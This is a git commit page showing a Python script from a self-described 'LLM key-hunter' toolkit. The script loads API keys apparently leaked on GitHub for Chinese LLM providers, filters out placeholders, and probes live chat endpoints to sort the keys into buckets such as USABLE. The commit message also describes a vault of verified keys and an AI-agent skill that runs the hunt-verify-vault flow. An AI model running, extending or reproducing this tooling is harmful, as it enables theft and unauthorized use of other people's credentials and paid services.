Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
This commit is contained in:
1 parent
a3f698806b
commit
5d215e1649
684 files changed
+133838
No files matched your search
@@ -0,0 +1,299 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Hunt & verify the remaining Chinese coding-plan / token-plan providers.
|
||||
|
||||
Providers covered (all OpenAI-compatible unless noted):
|
||||
- SCNet (超算互联网) sk-sp- / sk-tp- api.scnet.cn
|
||||
- Zyloo sk-zy- api.zyloo.io
|
||||
- LongCat (美团龙猫) ak_ (29 chars) api.longcat.chat
|
||||
- OllamaCloud <32hex>.<24alnum> api.ollama.com (native /api/chat)
|
||||
- iFlytek Astron (讯飞星辰) 32-hex maas-coding-api.xf-yun.com
|
||||
|
||||
iFlytek Astron keys in the pool are EXTREMELY noisy (the bare 32-hex pattern
|
||||
matches Azure/AWS keys, test vectors, etc.). We only test a 32-hex value when
|
||||
its source file / description references an xf-yun / astron / maas endpoint,
|
||||
and even then we filter out low-entropy placeholders.
|
||||
|
||||
Only HTTP 401 => DEAD. Real chat completion 200 with choices => USABLE.
|
||||
Uses verify_cache so already-tested keys are not re-queried.
|
||||
"""
|
||||
import argparse, json, os, re, sys, time
|
||||
import urllib.request, urllib.error
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from pathlib import Path
|
||||
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
||||
from verify_cache import CachedVerifier
|
||||
|
||||
OUT = Path("results/cn_coding"); OUT.mkdir(parents=True, exist_ok=True)
|
||||
POOL = Path("results/extracted_keys.txt")
|
||||
UA = "curl/8.5.0"
|
||||
|
||||
# ── provider config ────────────────────────────────────────────
|
||||
# model is the cheapest chat model for the auth/balance probe.
|
||||
PROVIDERS = {
|
||||
"SCNet": {
|
||||
"chat": "https://api.scnet.cn/api/llm/v1/chat/completions",
|
||||
"models": "https://api.scnet.cn/api/llm/v1/models",
|
||||
"model": "deepseek-v3",
|
||||
"auth": "Bearer",
|
||||
},
|
||||
"Zyloo": {
|
||||
"chat": "https://api.zyloo.io/v1/chat/completions",
|
||||
"models": "https://api.zyloo.io/v1/models",
|
||||
"model": "zyloo/claude-opus-4-7",
|
||||
"auth": "Bearer",
|
||||
},
|
||||
"LongCat": {
|
||||
"chat": "https://api.longcat.chat/openai/chat/completions",
|
||||
"models": "https://api.longcat.chat/openai/models",
|
||||
"model": "LongCat-2.0",
|
||||
"auth": "Bearer",
|
||||
},
|
||||
"OllamaCloud": {
|
||||
# native ollama api; model probed at runtime
|
||||
"chat": "https://api.ollama.com/api/chat",
|
||||
"models": "https://api.ollama.com/api/tags",
|
||||
"model": None,
|
||||
"auth": "Bearer",
|
||||
"native": True,
|
||||
},
|
||||
"iFlytekAstron": {
|
||||
"chat": "https://maas-coding-api.cn-huabei-1.xf-yun.com/v2/chat/completions",
|
||||
"models": "https://maas-coding-api.cn-huabei-1.xf-yun.com/v2/models",
|
||||
"model": "astron-code-latest",
|
||||
"auth": "Bearer",
|
||||
# try several documented models
|
||||
"alt_models": ["xopkimik26", "xopglm5", "xsparkx2flash"],
|
||||
},
|
||||
}
|
||||
|
||||
FAKES = ("xxxx", "your-", "example", "placeholder", "changeme",
|
||||
"sk-sp-123", "sk-tp-btf", "super-secret", "shared-test",
|
||||
"00000000000000000000000000000000000000")
|
||||
|
||||
IFLYTEK_CTX = re.compile(r'xf-?yun|astron|maas-coding|maas-token|iflytek|spark-api', re.I)
|
||||
|
||||
|
||||
def http(method, url, key, auth="Bearer", body=None, timeout=20):
|
||||
headers = {"User-Agent": UA, "Accept": "*/*"}
|
||||
if auth == "Bearer":
|
||||
headers["Authorization"] = f"Bearer {key}"
|
||||
elif auth == "x-api-key":
|
||||
headers["x-api-key"] = key
|
||||
data = None
|
||||
if body is not None:
|
||||
data = json.dumps(body).encode()
|
||||
headers["Content-Type"] = "application/json"
|
||||
req = urllib.request.Request(url, data=data, headers=headers, method=method)
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as r:
|
||||
return r.getcode(), r.read().decode("utf-8", "replace")
|
||||
except urllib.error.HTTPError as e:
|
||||
try: return e.code, e.read().decode("utf-8", "replace")
|
||||
except Exception: return e.code, ""
|
||||
except Exception as e:
|
||||
return 0, f"network: {type(e).__name__}: {e}"
|
||||
|
||||
|
||||
def classify_chat(code, body):
|
||||
bl = (body or "").lower()
|
||||
if code == 200 and ('"choices"' in bl or '"message"' in bl):
|
||||
return "USABLE", f"chat 200 {body[:100]}"
|
||||
if code == 401:
|
||||
return "DEAD", f"401: {body[:140]}"
|
||||
if code in (402, 429):
|
||||
return "NO_BALANCE", f"chat={code}: {body[:140]}"
|
||||
if code == 403:
|
||||
return "NO_ACCESS", f"403: {body[:140]}"
|
||||
if code == 400:
|
||||
if any(w in bl for w in ("balance", "quota", "insufficient", "arrear", "suspend")):
|
||||
return "NO_BALANCE", f"400: {body[:140]}"
|
||||
# 400 with "model" error often means key works but model not granted
|
||||
if "model" in bl:
|
||||
return "NO_ACCESS", f"400 model: {body[:140]}"
|
||||
return "NO_ACCESS", f"400: {body[:140]}"
|
||||
if code == 404:
|
||||
return "NO_ACCESS", f"404: {body[:120]}"
|
||||
if code == 0:
|
||||
return "UNKNOWN", body[:160]
|
||||
if 500 <= code < 600:
|
||||
return "NO_ACCESS", f"5xx {code}: {body[:120]}"
|
||||
return "NO_ACCESS", f"HTTP {code}: {body[:140]}"
|
||||
|
||||
|
||||
def verify_openai(prov, key):
|
||||
cfg = PROVIDERS[prov]
|
||||
models = [cfg["model"]] + list(cfg.get("alt_models", []))
|
||||
last = ("UNKNOWN", "no attempt")
|
||||
for model in models:
|
||||
if not model:
|
||||
continue
|
||||
code, body = http("POST", cfg["chat"], key, cfg["auth"], {
|
||||
"model": model,
|
||||
"messages": [{"role": "user", "content": "hi"}],
|
||||
"max_tokens": 5, "temperature": 0,
|
||||
})
|
||||
v, d = classify_chat(code, body)
|
||||
if v == "USABLE":
|
||||
return "USABLE", f"[{model}] {d}"
|
||||
# 401 / 422 model-not-exist: try next model; 422 with model means model
|
||||
# name wrong but key may be fine — try alternates.
|
||||
if code == 401:
|
||||
return "DEAD", d
|
||||
last = (v, f"[{model}] {d}")
|
||||
if code == 422 and "model" in body.lower():
|
||||
continue
|
||||
if v in ("NO_BALANCE", "NO_ACCESS"):
|
||||
# already a meaningful verdict, but try an alternate cheap model once
|
||||
continue
|
||||
return last
|
||||
|
||||
|
||||
def verify_ollama(key):
|
||||
# native ollama /api/chat
|
||||
code, body = http("POST", "https://api.ollama.com/api/chat", key, "Bearer", {
|
||||
"model": "llama3.2", "messages": [{"role": "user", "content": "hi"}],
|
||||
"stream": False,
|
||||
}, timeout=25)
|
||||
if code == 404:
|
||||
# try /api/generate
|
||||
code, body = http("POST", "https://api.ollama.com/api/generate", key, "Bearer", {
|
||||
"model": "llama3.2", "prompt": "hi", "stream": False,
|
||||
}, timeout=25)
|
||||
if code == 200:
|
||||
return "USABLE", f"ollama 200 {body[:100]}"
|
||||
if code == 401:
|
||||
return "DEAD", f"401: {body[:140]}"
|
||||
if code in (402, 429):
|
||||
return "NO_BALANCE", f"{code}: {body[:140]}"
|
||||
if code == 0:
|
||||
return "UNKNOWN", body[:160]
|
||||
return "NO_ACCESS", f"HTTP {code}: {body[:140]}"
|
||||
|
||||
|
||||
def verify(prov_key):
|
||||
prov, key = prov_key
|
||||
if prov == "OllamaCloud":
|
||||
return verify_ollama(key)
|
||||
return verify_openai(prov, key)
|
||||
|
||||
|
||||
def verify_cache_key(ck):
|
||||
"""CachedVerifier needs a string key; wrap verify() to accept 'prov|key'."""
|
||||
prov, key = ck.split("|", 1)
|
||||
return verify((prov, key))
|
||||
|
||||
|
||||
# ── candidate loading ─────────────────────────────────────────
|
||||
def entropy_ok_hex(k):
|
||||
"""Reject obvious placeholder 32/64-hex: all-same, sequential, mostly zeros."""
|
||||
if len(k) not in (32, 40, 64):
|
||||
return False
|
||||
if len(set(k)) <= 4:
|
||||
return False
|
||||
if k.count("0") > len(k) * 0.7:
|
||||
return False
|
||||
if re.match(r'^0123456789abcdef+$', k):
|
||||
return False
|
||||
# ascending/descending runs
|
||||
if re.search(r'0123456789|9876543210|abcdef|fedcba', k):
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def load_candidates(providers):
|
||||
cands = {p: {} for p in providers}
|
||||
with open(POOL, errors="replace") as f:
|
||||
for ln in f:
|
||||
p = ln.rstrip("\n").split("|", 3)
|
||||
if len(p) < 3:
|
||||
continue
|
||||
tag, key, src = p[0], p[1], p[2]
|
||||
desc = p[3] if len(p) > 3 else ""
|
||||
if tag not in cands:
|
||||
continue
|
||||
if any(b in key.lower() for b in FAKES):
|
||||
continue
|
||||
if tag == "iFlytekCodingPlan":
|
||||
# only test hex in genuine xf-yun context
|
||||
if not (IFLYTEK_CTX.search(src) or IFLYTEK_CTX.search(desc)):
|
||||
continue
|
||||
if not re.fullmatch(r'[0-9a-f]{32}', key):
|
||||
continue
|
||||
if not entropy_ok_hex(key):
|
||||
continue
|
||||
if tag == "OllamaCloud":
|
||||
if not re.fullmatch(r'[0-9a-f]{32}\.[A-Za-z0-9]{20,30}', key):
|
||||
continue
|
||||
if tag == "SCNet":
|
||||
# sk-sp- keys in pool are actually Alibaba; only sk-tp- and plain
|
||||
if not (key.startswith("sk-tp-") or
|
||||
(key.startswith("sk-") and not key.startswith("sk-sp-"))):
|
||||
continue
|
||||
if key not in cands[tag]:
|
||||
cands[tag][key] = src
|
||||
return cands
|
||||
|
||||
|
||||
def main():
|
||||
ap = argparse.ArgumentParser()
|
||||
ap.add_argument("--providers", default="all",
|
||||
help="comma list or all: " + ",".join(PROVIDERS))
|
||||
ap.add_argument("--workers", type=int, default=12)
|
||||
ap.add_argument("--limit", type=int, default=0)
|
||||
ap.add_argument("--no-cache", action="store_true")
|
||||
args = ap.parse_args()
|
||||
|
||||
provs = list(PROVIDERS) if args.providers == "all" else [
|
||||
p.strip() for p in args.providers.split(",") if p.strip() in PROVIDERS]
|
||||
|
||||
cands = load_candidates(provs)
|
||||
grand = {}
|
||||
for p in provs:
|
||||
items = list(cands[p].items())
|
||||
if args.limit:
|
||||
items = items[:args.limit]
|
||||
for k, s in items:
|
||||
grand[(p, k)] = s
|
||||
print(f"{p:16s}: {len(items)} candidates")
|
||||
|
||||
print(f"\nverifying {len(grand)} keys across {len(provs)} providers...\n")
|
||||
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [],
|
||||
"UNKNOWN": [], "DEAD": []}
|
||||
|
||||
with CachedVerifier("cn_coding", verify_cache_key, force=args.no_cache) as ver:
|
||||
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
||||
futs = {pool.submit(ver, f"{pk[0]}|{pk[1]}"): (pk, s) for pk, s in grand.items()}
|
||||
done = 0
|
||||
for fut in as_completed(futs):
|
||||
(prov, key), src = futs[fut]
|
||||
done += 1
|
||||
try:
|
||||
v, d = fut.result()
|
||||
except Exception as e:
|
||||
v, d = "UNKNOWN", f"exc:{e}"
|
||||
buckets[v].append((prov, key, src, d))
|
||||
if done % 25 == 0:
|
||||
print(f" {done}/{len(grand)} usable={len(buckets['USABLE'])} "
|
||||
f"nobal={len(buckets['NO_BALANCE'])} "
|
||||
f"noacc={len(buckets['NO_ACCESS'])} dead={len(buckets['DEAD'])} "
|
||||
f"hit={ver.hits} live={ver.live}", flush=True)
|
||||
print(f"cache: {ver.hits} hits / {ver.live} live\n")
|
||||
|
||||
name_map = {"USABLE": "usable", "NO_BALANCE": "no_balance",
|
||||
"NO_ACCESS": "no_access", "UNKNOWN": "unknown", "DEAD": "dead"}
|
||||
for label, fn in name_map.items():
|
||||
with (OUT / f"{fn}.txt").open("w") as f:
|
||||
for prov, key, src, d in buckets[label]:
|
||||
f.write(f"{prov}|{key}|{src}|{d}\n")
|
||||
|
||||
for label in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
|
||||
print(f" {label:11s}: {len(buckets[label])}")
|
||||
if buckets["USABLE"]:
|
||||
print("\n=== USABLE ===")
|
||||
for prov, key, src, d in buckets["USABLE"]:
|
||||
print(f" [{prov}] {key}\n {src}\n {d[:120]}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in new issue
Block a user